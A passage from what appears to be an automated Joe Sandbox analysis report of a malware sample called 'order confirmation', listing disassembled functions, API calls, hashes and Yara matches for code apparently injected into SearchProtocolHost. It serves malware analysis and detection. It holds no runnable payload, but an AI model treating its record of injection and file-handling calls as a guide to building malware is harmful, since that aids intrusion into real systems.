                                                    • Instruction Fuzzy Hash: E7411031600326ABD722CF29CC41B26B7A5FBA5715F10061AF945EB3A0DB31E8528BE1
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: 33e3c4aa68d691d2a633beebf391008f02696f59e6037772c1e34b2382ef84f3
                                                    • Instruction ID: 29cdd1b7ad2176b50c8a595699087541749713fb89703c1eeb08ef207d646bb7
                                                    • Opcode Fuzzy Hash: 33e3c4aa68d691d2a633beebf391008f02696f59e6037772c1e34b2382ef84f3
                                                    • Instruction Fuzzy Hash: 85318472A00219AFDB60DE3DCC40FEF77BCEB54654F84055BE949E3250EB709A848BA1
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-
                                                    • API String ID: 1302938615-2137968064
                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction ID: b741cee594843c46f6816475e7e011b76d5b36f70382c164fa2da48695b9921c
                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction Fuzzy Hash: 1D91B171E0030A9BEF24DF6DC881ABEBBA5EF44328F54461EEB65E72C0D73099458B11
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$@
                                                    • API String ID: 0-1194432280
                                                    • Opcode ID: 09ded741acb4b3bbb7aaac159a7e0f6777b34abdd2358d0b194b68fa15e537c5
                                                    • Instruction ID: 4a2408a5372249086fbc920484b452fca8ab5367028de4c8a4f784e2cdf99e16
                                                    • Opcode Fuzzy Hash: 09ded741acb4b3bbb7aaac159a7e0f6777b34abdd2358d0b194b68fa15e537c5
                                                    • Instruction Fuzzy Hash: 9A811B71D002699BDB359B54CC44BEEBBB4AF08714F1041EAEA1DB7690E7705E85CFA0
                                                    APIs
                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0143CFBD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: CallFilterFunc@8
                                                    • String ID: @$@4Qw@4Qw
                                                    • API String ID: 4062629308-2383119779
                                                    • Opcode ID: 6001caa91a27a8e3b0280732b7e7341388d8d3f73a1963e15bc0c2447d547301
                                                    • Instruction ID: 05a6fb899e12bb1e458dccec4419dd2104abdee034f94a9747c970772526e518
                                                    • Opcode Fuzzy Hash: 6001caa91a27a8e3b0280732b7e7341388d8d3f73a1963e15bc0c2447d547301
                                                    • Instruction Fuzzy Hash: C0419EB1900215DFCB219FA9C840AAEFBB8FF99B58F51402FE904DB264E734D801CB61

                                                    Execution Graph

                                                    Execution Coverage: 2.4%
                                                    Dynamic/Decrypted Code Coverage: 4.3%
                                                    Signature Coverage: 1.6%
                                                    Total number of Nodes: 446
                                                    Total number of Limit Nodes: 72
                                                    execution_graph: node/edge list of the execution graph (rendered as an image in the original report; the raw node and edge data is not reproduced here). API calls referenced by the graph nodes: LdrInitializeThunk, LdrLoadDll, NtCreateFile, NtClose, NtReadFile, NtDeleteFile, NtAllocateVirtualMemory, CreateProcessInternalW, CreateThread, RtlAllocateHeap, RtlFreeHeap, GetFileAttributesW, SetErrorMode, Sleep, PostThreadMessageW, CoInitialize, CoUninitialize, FindFirstFileW, FindNextFileW, FindClose.

                                                    Control-flow Graph

                                                    • Legend: Executed / Not Executed
                                                    control_flow_graph: basic-block graph for the function starting at 9e9ea0 (rendered as an image in the original report; the raw block and edge data is not reproduced here). The graph contains a call to a0b3d0.
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: [$ Z$"|$%$(w$)$1$56f3$H$Hm$K$N\$Qj$OR4"|$R4"|$]$a$d$d9$f3$hy$j$lj$m=hy$n$o$q$v$z$}
                                                    • API String ID: 0-4081740624
                                                    • Opcode ID: 46d82c0d2bf18cc834bd312c91f31a62ec976a17cd6f0789187a3983fb249b13
                                                    • Instruction ID: 933b0e1874ae5c5a288c043b60655a1e536d7b76033c9abbd6b16c494cef25ea
                                                    • Opcode Fuzzy Hash: 46d82c0d2bf18cc834bd312c91f31a62ec976a17cd6f0789187a3983fb249b13
                                                    • Instruction Fuzzy Hash: 4142ABB0905268CBEB65CF45C894BDDBBB1BB45308F2085DAC40D7B291CBB96EC98F51
                                                    APIs
                                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 009FC938
                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 009FC973
                                                    • FindClose.KERNELBASE(?), ref: 009FC97E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 3541575487-0
                                                    • Opcode ID: d89848fe7256e9ce5e025eda469e0519624b9d75b2f5e6b32e4613596c328191
                                                    • Instruction ID: 0f3489cec27dd7aeb06b0dcbc1735f26321a8dc71172af953e5d14e4469d81db
                                                    • Opcode Fuzzy Hash: d89848fe7256e9ce5e025eda469e0519624b9d75b2f5e6b32e4613596c328191
                                                    • Instruction Fuzzy Hash: 6A3150B190024CBBDB21DFA4CD85FFE777CEF84744F148459B948A71C1DAB0AA848BA0
                                                    APIs
                                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00A094A1
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: d55cf91759196bf18ac3fda808b7da1411fa9cc5a05f4d33fcbe879a96a2afb3
                                                    • Instruction ID: 1acf93ca97001694e9e0b65a16d7f2cae0ee21d9e55ada8f65009e89f5df9a81
                                                    • Opcode Fuzzy Hash: d55cf91759196bf18ac3fda808b7da1411fa9cc5a05f4d33fcbe879a96a2afb3
                                                    • Instruction Fuzzy Hash: 1E31D6B5A01248AFCB14DF98D881EDFB7B9EF8C304F108219F918A3340D730A951CBA5
                                                    APIs
                                                    • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00A095F9
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 008ae1cd979c5dd922d3da6ceb314d723fd3473bbf4367fba8781d2feef65871
                                                    • Instruction ID: 62f4d32264dfcfbe15005ec0ef9417ebe03538db594ccdf9e3d6bcae55f2d37d
                                                    • Opcode Fuzzy Hash: 008ae1cd979c5dd922d3da6ceb314d723fd3473bbf4367fba8781d2feef65871
                                                    • Instruction Fuzzy Hash: 2531E9B5A00208AFCB14DF99D881EEFB7B9EF88304F108209F918A3341D770A951CFA5
                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(009F2088,?,00A0816F,00000000,00000004,00003000,?,?,?,?,?,00A0816F,009F2088,10458B0C,009F2088,00000000), ref: 00A098E8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: d35709bc92f01a1c6c3088e0d00430d9e238462b21be05e3067fd54b4be63693
                                                    • Instruction ID: b3cdf07de8119332bfff8cefa13a752f61593fb7f1c2250949c0a080b8e10101
                                                    • Opcode Fuzzy Hash: d35709bc92f01a1c6c3088e0d00430d9e238462b21be05e3067fd54b4be63693
                                                    • Instruction Fuzzy Hash: BF212DB5A00649AFDB14DF98DC41EEF77B9EF88304F00850AF918A7381D770A951CBA1
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: a16a95abcbffbf5d145a8d9bc3aaada73f347d3dc5252d097396534119c79234
                                                    • Instruction ID: c58286a156882120377dc4b0d047f9c98fdafd1423a031fd20e88c563575adcb
                                                    • Opcode Fuzzy Hash: a16a95abcbffbf5d145a8d9bc3aaada73f347d3dc5252d097396534119c79234
                                                    • Instruction Fuzzy Hash: 3711A071600648BFD720EBA5DC02FEF776CDF84304F008509F94867281E7717A558BA6
                                                    APIs
                                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00A096E4
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                    • Instruction ID: 30e9459bd110f69639c7748841681c07fa392c08e0402cdec310d9829c3bdc58
                                                    • Opcode Fuzzy Hash: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                    • Instruction Fuzzy Hash: A8E08C362103447BC620FA6ADC01FAB776CEFC5794F00451AFA08A7282D771B90187F1
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 0c42f43bf2222fba01bd5c29eb086866dd7681f8c01a4b282a90688d626bf97f
                                                    • Instruction ID: de56682de6b5d3ce8f925cafd4abf8f655f6b0bdf2894e78edc892590fb736d8
                                                    • Opcode Fuzzy Hash: 0c42f43bf2222fba01bd5c29eb086866dd7681f8c01a4b282a90688d626bf97f
                                                    • Instruction Fuzzy Hash: 70900271705804129140B1585C845464045A7E0311B59C011E8424655C8B148A565361
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 16e154e45ef026faa2ea2919e516be16e0420b8497e3efa124976c68b888ffef
                                                    • Instruction ID: aef9c3c003b2b6be4152ef9ac7deb9dc2a099abcc97aaaf6d9118b0bae750ee4
                                                    • Opcode Fuzzy Hash: 16e154e45ef026faa2ea2919e516be16e0420b8497e3efa124976c68b888ffef
                                                    • Instruction Fuzzy Hash: C09002A1701504424140B1585C044066045A7E1311399C115A8554661C871889559269
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: a44fc09d0d57f0f6907a84f9369cd2f08980d3004188d958f0d7f3da53b24f09
                                                    • Instruction ID: d8f1b46f89c21a7cd3d449fdcbd08d8e7c04477f4da068578f528b561e60f2a9
                                                    • Opcode Fuzzy Hash: a44fc09d0d57f0f6907a84f9369cd2f08980d3004188d958f0d7f3da53b24f09
                                                    • Instruction Fuzzy Hash: 8B9002A1302404034105B1585814616404A97E0211B59C021E9014691DC62589916125
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 50294853982fca8345384628c898ace4f5ca6af1bb44634352b81326f82008eb
                                                    • Instruction ID: 6890822d5e708b24d98df67291b81822bd9b6333860144da50153ec9361f9d51
                                                    • Opcode Fuzzy Hash: 50294853982fca8345384628c898ace4f5ca6af1bb44634352b81326f82008eb
                                                    • Instruction Fuzzy Hash: E890027130140C02D180B158580464A004597D1311F99C015A8025755DCB158B5977A1
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 520a7c07090cc4adef5a25d376296521e6b3f074f7f9a237b8cf4d0afa2dc204
                                                    • Instruction ID: bc95076ddb9a220581e42ebedda82283fe26e5894bd66f7d5146f4f1edcd6b7e
                                                    • Opcode Fuzzy Hash: 520a7c07090cc4adef5a25d376296521e6b3f074f7f9a237b8cf4d0afa2dc204
                                                    • Instruction Fuzzy Hash: 9E90027130544C42D140B1585804A46005597D0315F59C011A8064795D97258E55B661
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 778d3d79d3c4711ebbe0b0b01f9f16402326e828eee0740e383665cb37391388
                                                    • Instruction ID: 25c6b60ea163f14ac48c126af4b160af33c2e26b3cd46b66591f41a5c08edfd0
                                                    • Opcode Fuzzy Hash: 778d3d79d3c4711ebbe0b0b01f9f16402326e828eee0740e383665cb37391388
                                                    • Instruction Fuzzy Hash: F690027170540C02D150B1585814746004597D0311F59C011A8024755D87558B5576A1
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 370c5ae0fd802c6203e34d96ca8b997507cc60ccc9662ff9a9c0d89d674143c1
                                                    • Instruction ID: a270c4b645481ecb8b80a6672150b1502083afaf8816971c3efc6e3a25d54972
                                                    • Opcode Fuzzy Hash: 370c5ae0fd802c6203e34d96ca8b997507cc60ccc9662ff9a9c0d89d674143c1
                                                    • Instruction Fuzzy Hash: 07900475311404030105F55C1F0450700C7D7D537135DC031FD015751CD731CD715131
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 4d3f15b22d865348ace4403a5b8b1cef6de03164401e6a4b7e9e355b7fcdd5a3
                                                    • Instruction ID: dced1538995ed0a774158668d4a3cc32539f9fc6a9a667c3b5476f84de1df91c
                                                    • Opcode Fuzzy Hash: 4d3f15b22d865348ace4403a5b8b1cef6de03164401e6a4b7e9e355b7fcdd5a3
                                                    • Instruction Fuzzy Hash: 02900265321404020145F5581A0450B0485A7D6361399C015F9416691CC72189655321
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f11a37319f9435fd45c5665d246ddd5f8db456e245dd643bd2755caab24882e5
                                                    • Instruction ID: fbcb8319d763101bf22d9bd124ec298273cf22ab97e5c33d060c046d7933ae26
                                                    • Opcode Fuzzy Hash: f11a37319f9435fd45c5665d246ddd5f8db456e245dd643bd2755caab24882e5
                                                    • Instruction Fuzzy Hash: 729002A134140842D100B1585814B060045D7E1311F59C015E9064655D8719CD526126
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 68a73311424af5ff1a6e3d5285be04edb03922d3a447ad8610b706fda8932801
                                                    • Instruction ID: 6fbc1cfa09afa96441598ebe68df3311fe52b5e64b676fb6385d7e42f748c4ad
                                                    • Opcode Fuzzy Hash: 68a73311424af5ff1a6e3d5285be04edb03922d3a447ad8610b706fda8932801
                                                    • Instruction Fuzzy Hash: E0900261311C0442D200B5685C14B07004597D0313F59C115A8154655CCA1589615521
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3cc27085d7e1e0ff0812cf78160d34e2ffd075d9c16561362299605d231867e1
                                                    • Instruction ID: 241a4c679739d24fde90559e23fb864424f9ff7a677aaeff0daf17c1671a9307
                                                    • Opcode Fuzzy Hash: 3cc27085d7e1e0ff0812cf78160d34e2ffd075d9c16561362299605d231867e1
                                                    • Instruction Fuzzy Hash: 72900261701404424140B1689C449064045BBE1221759C121A8998651D865989655665
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6d1fb4b106a7aca851679ce1aeec493d3a848066328450b7e8cf696150fdc31a
                                                    • Instruction ID: f84d8a4b70eecbd18b6e2092d882f70e7e3e3ac1a0add3a5c845ebdf50934a9c
                                                    • Opcode Fuzzy Hash: 6d1fb4b106a7aca851679ce1aeec493d3a848066328450b7e8cf696150fdc31a
                                                    • Instruction Fuzzy Hash: 789002A130180803D140B5585C04607004597D0312F59C011AA064656E8B298D516135
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6db27a85e17d6fb8c5c68ec23aef9b480409110ed761ee74a62868f2b69ebe50
                                                    • Instruction ID: fda6ab372e91c17896f293c7ea70a6ed6cf04c24480aecf996355b3e89e3161f
                                                    • Opcode Fuzzy Hash: 6db27a85e17d6fb8c5c68ec23aef9b480409110ed761ee74a62868f2b69ebe50
                                                    • Instruction Fuzzy Hash: E590026170140902D101B1585804616004A97D0251F99C022A9024656ECB258A92A131
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 52e6b1196eed05014020a580595ad8606e9b5b4823d1d8458d17b35b9eba9a93
                                                    • Instruction ID: 2ad1fef6eb54c7f92aacbb188052bf7e8d92cb6871f71946f20d2dce73da33ad
                                                    • Opcode Fuzzy Hash: 52e6b1196eed05014020a580595ad8606e9b5b4823d1d8458d17b35b9eba9a93
                                                    • Instruction Fuzzy Hash: BD90026931340402D180B158680860A004597D1212F99D415A8015659CCA1589695321
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9722941f284c86ce211e2b358131065fb654f1749f6d4ed5ef44a66c2458fe8b
                                                    • Instruction ID: 301c3115797d7946cc90c3af2708ff851a08370568b4402e16f85daa8629aa99
                                                    • Opcode Fuzzy Hash: 9722941f284c86ce211e2b358131065fb654f1749f6d4ed5ef44a66c2458fe8b
                                                    • Instruction Fuzzy Hash: 0490026130140403D140B15868186064045E7E1311F59D011E8414655CDA1589565222
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
